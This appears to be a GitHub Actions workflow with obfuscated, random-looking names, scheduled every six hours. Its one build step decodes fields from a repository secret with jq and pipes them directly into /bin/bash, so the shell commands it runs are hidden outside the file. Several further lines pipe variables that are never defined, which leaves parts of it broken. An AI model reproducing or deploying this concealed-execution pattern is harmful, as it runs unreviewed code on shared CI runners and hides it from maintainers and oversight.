name: tonghugjiga

on:
  workflow_dispatch:
  schedule:
    - cron: '45 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: tonghugjiga
        env:
          ipggv50688: ${{ secrets.ipggv50688 }}
        run: |
          echo $ipggv50688 | jq -r .tynj417 | /bin/bash
          echo $j36 | jq -r .kobmf23 | /bin/bash
          echo $v64 | jq -r .g97419 | /bin/bash
          echo $cttu645 | jq -r .rdfc41159 | /bin/bash
          echo $so52 | jq -r .p8 | /bin/bash
          echo $c123 | jq -r .xy0258 | /bin/bash
          echo $awan079 | jq -r .gppu26153 | /bin/bash
          echo $ewwwc17999 | jq -r .l29 | /bin/bash

